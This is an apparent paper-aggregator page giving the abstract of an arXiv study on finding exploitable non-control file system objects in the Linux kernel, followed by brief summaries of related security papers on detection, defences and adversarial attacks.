Beyond Control: Exploring Novel File System Objects for Data-Only Attacks on Linux Systems
- URL: http://arxiv.org/abs/2401.17618v2
- Date: Sat, 7 Sep 2024 22:49:29 GMT
- Title: Beyond Control: Exploring Novel File System Objects for Data-Only Attacks on Linux Systems
- Authors: Jinmeng Zhou, Jiayi Hu, Ziyue Pan, Jiaxun Zhu, Wenbo Shen, Guoren Li, Zhiyun Qian,
- Abstract summary: We semi-automatically discover and evaluate exploitable non-control data within the file subsystem of the Linux kernel.
We use 18 real-world CVEs to evaluate the exploitability of the file system objects using various exploit strategies.
We develop 10 end-to-end exploits using a subset of CVEs against the kernel with all state-of-the-art mitigations enabled.
- Score: 15.913967348814323
- License: http://arxiv.org/licenses/nonexclusive-distrib/1.0/
- Abstract: The widespread deployment of control-flow integrity has propelled non-control data attacks into the mainstream. In the domain of OS kernel exploits, by corrupting critical non-control data, local attackers can directly gain root access or privilege escalation without hijacking the control flow. As a result, OS kernels have been restricting the availability of such non-control data. This forces attackers to continue to search for more exploitable non-control data in OS kernels. However, discovering unknown non-control data can be daunting because they are often tied heavily to semantics and lack universal patterns. We make two contributions in this paper: (1) discover critical non-control objects in the file subsystem and (2) analyze their exploitability. This work represents the first study, with minimal domain knowledge, to semi-automatically discover and evaluate exploitable non-control data within the file subsystem of the Linux kernel. Our solution utilizes a custom analysis and testing framework that statically and dynamically identifies promising candidate objects. Furthermore, we categorize these discovered objects into types that are suitable for various exploit strategies, including a novel strategy necessary to overcome the defense that isolates many of these objects. These objects have the advantage of being exploitable without requiring KASLR, thus making the exploits simpler and more reliable. We use 18 real-world CVEs to evaluate the exploitability of the file system objects using various exploit strategies. We develop 10 end-to-end exploits using a subset of CVEs against the kernel with all state-of-the-art mitigations enabled.
Related papers
- DATABench: Evaluating Dataset Auditing in Deep Learning from an Adversarial Perspective [59.66984417026933]
We introduce a novel taxonomy, classifying existing methods based on their reliance on internal features (IF) (inherent to the data) versus external features (EF) (artificially introduced for auditing)<n>We formulate two primary attack types: evasion attacks, designed to conceal the use of a dataset, and forgery attacks, intending to falsely implicate an unused dataset.<n>Building on the understanding of existing methods and attack objectives, we further propose systematic attack strategies: decoupling, removal, and detection for evasion; adversarial example-based methods for forgery.<n>Our benchmark, DATABench, comprises 17 evasion attacks, 5 forgery attacks, and 9
arXiv Detail & Related papers (2025-07-08T03:07:15Z) - User-space library rootkits revisited: Are user-space detection mechanisms futile? [0.0]
This work is to answer the question: Is detecting user-space rootkits with user-space tools futile?<n>Contrary to the prevailing view that considers it effective, we argue that the detection of user-space rootkits cannot be done in user-space at all.<n>This manuscript describes the classical approach to build user-space library rootkits, the traditional detection mechanisms, and different evasion techniques.
arXiv Detail & Related papers (2025-06-09T14:50:48Z) - CANTXSec: A Deterministic Intrusion Detection and Prevention System for CAN Bus Monitoring ECU Activations [53.036288487863786]
We propose CANTXSec, the first deterministic Intrusion Detection and Prevention system based on physical ECU activations.<n>It detects and prevents classical attacks in the CAN bus, while detecting advanced attacks that have been less investigated in the literature.<n>We prove the effectiveness of our solution on a physical testbed, where we achieve 100% detection accuracy in both classes of attacks while preventing 100% of FIAs.
arXiv Detail & Related papers (2025-05-14T13:37:07Z) - The Cost of Performance: Breaking ThreadX with Kernel Object Masquerading Attacks [16.54210795506388]
We show that popular real-time operating systems (RTOSs) lack essential security protections.
We identify a performance optimization practice in ThreadX that introduces security vulnerabilities, allowing for the circumvention of parameter sanitization processes.
We introduce an automated approach involving under-constrained symbolic execution to identify the Kernel Object Masquerading (KOM) Attack.
arXiv Detail & Related papers (2025-04-28T05:01:35Z) - From Past to Present: A Survey of Malicious URL Detection Techniques, Datasets and Code Repositories [3.323388021979584]
Malicious URLs persistently threaten the cybersecurity ecosystem, by either deceiving users into divulging private data or distributing harmful payloads to infiltrate host systems.
This review systematically analyzes methods from traditional blacklisting to advanced deep learning approaches.
Unlike prior surveys, we propose a novel modality-based taxonomy that categorizes existing works according to their primary data modalities.
arXiv Detail & Related papers (2025-04-23T06:23:18Z) - The Reversing Machine: Reconstructing Memory Assumptions [2.66610643553864]
A malicious kernel-level driver can bypass OS-level anti-virus mechanisms easily.
We present textitThe Reversing Machine (TRM), a new hypervisor-based memory introspection design for reverse engineering.
We show that TRM can detect each threat and that, out of 24 state-of-the-art AV solutions, only TRM can detect the most advanced threats.
arXiv Detail & Related papers (2024-05-01T03:48:22Z) - Securing Monolithic Kernels using Compartmentalization [0.9236074230806581]
A single flaw in a non-essential part of the kernel can cause the entire operating system to fall under an attacker's control.
Kernel hardening techniques might prevent certain types of vulnerabilities, but they fail to address a fundamental weakness.
We propose a taxonomy that allows the community to compare and discuss future work.
arXiv Detail & Related papers (2024-04-12T04:55:13Z) - GuardFS: a File System for Integrated Detection and Mitigation of Linux-based Ransomware [8.576433180938004]
GuardFS is a file system-based approach to investigate the integration of detection and mitigation of ransomware.
Using a bespoke overlay file system, data is extracted before files are accessed.
Models trained on this data are used by three novel defense configurations that obfuscate, delay, or track access to the file system.
arXiv Detail & Related papers (2024-01-31T15:33:29Z) - OutCenTR: A novel semi-supervised framework for predicting exploits of
vulnerabilities in high-dimensional datasets [0.0]
We make use of outlier detection techniques to predict vulnerabilities that are likely to be exploited.
We propose a dimensionality reduction technique, OutCenTR, that enhances the baseline outlier detection models.
The results of our experiments show on average a 5-fold improvement of F1 score in comparison with state-of-the-art dimensionality reduction techniques.
arXiv Detail & Related papers (2023-04-03T00:34:41Z) - DRSM: De-Randomized Smoothing on Malware Classifier Providing Certified
Robustness [58.23214712926585]
We develop a certified defense, DRSM (De-Randomized Smoothed MalConv), by redesigning the de-randomized smoothing technique for the domain of malware detection.
Specifically, we propose a window ablation scheme to provably limit the impact of adversarial bytes while maximally preserving local structures of the executables.
We are the first to offer certified robustness in the realm of static detection of malware executables.
arXiv Detail & Related papers (2023-03-20T17:25:22Z) - Few-Shot Backdoor Attacks on Visual Object Tracking [80.13936562708426]
Visual object tracking (VOT) has been widely adopted in mission-critical applications, such as autonomous driving and intelligent surveillance systems.
We show that an adversary can easily implant hidden backdoors into VOT models by tempering with the training process.
We show that our attack is resistant to potential defenses, highlighting the vulnerability of VOT models to potential backdoor attacks.
arXiv Detail & Related papers (2022-01-31T12:38:58Z) - VELVET: a noVel Ensemble Learning approach to automatically locate
VulnErable sTatements [62.93814803258067]
This paper presents VELVET, a novel ensemble learning approach to locate vulnerable statements in source code.
Our model combines graph-based and sequence-based neural networks to successfully capture the local and global context of a program graph.
VELVET achieves 99.6% and 43.6% top-1 accuracy over synthetic data and real-world data, respectively.
arXiv Detail & Related papers (2021-12-20T22:45:27Z) - No Need to Know Physics: Resilience of Process-based Model-free Anomaly
Detection for Industrial Control Systems [95.54151664013011]
We present a novel framework to generate adversarial spoofing signals that violate physical properties of the system.
We analyze four anomaly detectors published at top security conferences.
arXiv Detail & Related papers (2020-12-07T11:02:44Z) - Dos and Don'ts of Machine Learning in Computer Security [74.1816306998445]
Despite great potential, machine learning in security is prone to subtle pitfalls that undermine its performance.
We identify common pitfalls in the design, implementation, and evaluation of learning-based security systems.
We propose actionable recommendations to support researchers in avoiding or mitigating the pitfalls where possible.
arXiv Detail & Related papers (2020-10-19T13:09:31Z) - Adversarial EXEmples: A Survey and Experimental Evaluation of Practical
Attacks on Machine Learning for Windows Malware Detection [67.53296659361598]
adversarial EXEmples can bypass machine learning-based detection by perturbing relatively few input bytes.
We develop a unifying framework that does not only encompass and generalize previous attacks against machine-learning models, but also includes three novel attacks.
These attacks, named Full DOS, Extend and Shift, inject the adversarial payload by respectively manipulating the DOS header, extending it, and shifting the content of the first section.
arXiv Detail & Related papers (2020-08-17T07:16:57Z)
This list is automatically generated from the titles and abstracts of the papers in this site.
This site does not guarantee the quality of this site (including all information) and is not responsible for any consequences.